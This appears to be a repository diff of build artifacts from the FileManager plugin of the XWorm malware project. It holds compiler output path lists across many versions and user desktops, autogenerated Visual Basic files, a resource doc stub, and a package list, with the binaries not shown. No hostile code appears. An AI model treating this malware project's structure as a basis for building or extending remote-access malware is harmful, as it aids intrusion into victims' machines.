C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.pdb
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FileManager\FileManager\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\FileManager\FileManager\obj\Debug\FileManager.dll
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,26 @@
|
||||
<?xml version="1.0"?>
|
||||
<doc>
|
||||
<assembly>
|
||||
<name>
|
||||
FileManager
|
||||
</name>
|
||||
</assembly>
|
||||
<members>
|
||||
<member name="T:FileManager.My.Resources.Resources">
|
||||
<summary>
|
||||
A strongly-typed resource class, for looking up localized strings, etc.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:FileManager.My.Resources.Resources.ResourceManager">
|
||||
<summary>
|
||||
Returns the cached ResourceManager instance used by this class.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:FileManager.My.Resources.Resources.Culture">
|
||||
<summary>
|
||||
Overrides the current thread's CurrentUICulture property for all
|
||||
resource lookups using this strongly typed resource class.
|
||||
</summary>
|
||||
</member>
|
||||
</members>
|
||||
</doc>
|
||||
Binary file not shown.
BIN
Binary file not shown.
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
+7
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
+7
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
Binary file not shown.
@@ -0,0 +1,3 @@
|
||||
FileManager.dll
|
||||
Microsoft.WindowsAPICodePack.dll
|
||||
Microsoft.WindowsAPICodePack.Shell.dll
|
||||
Binary file not shown.
BIN
Binary file not shown.
@@ -0,0 +1 @@
|
||||
5fc4d43047a0e77c10d6544f52b8937cbbefbbcab05452a7265a5ec168fbcfca
|
||||
@@ -0,0 +1,6 @@
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\FileManager.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\FileManager.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\FileManager.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\FileManager.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\FileManager\FileManager\obj\Release\FileManager.pdb
|
||||
Binary file not shown.
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
@@ -0,0 +1,5 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<packages>
|
||||
<package id="ILMerge" version="3.0.29" targetFramework="net40" requireReinstallation="true" />
|
||||
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
|
||||
</packages>
|
||||
Binary file not shown.
Reference in New Issue
Block a user